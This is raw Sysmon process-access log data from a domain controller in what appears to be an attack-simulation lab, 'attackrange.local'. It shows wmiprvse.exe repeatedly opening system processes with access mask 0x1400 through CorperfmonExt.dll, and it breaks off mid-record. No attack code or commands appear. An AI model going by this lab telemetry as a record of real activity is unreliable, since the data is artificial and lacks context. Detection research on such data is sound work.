13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006026Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006025Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006024Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006023Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006022Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006021Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006020Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006019Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006018Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006017Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006016Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006015Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006014Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006013Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006012Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006011Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006010Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006009Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006008Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006007Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006006Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006005Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006004Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006003Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 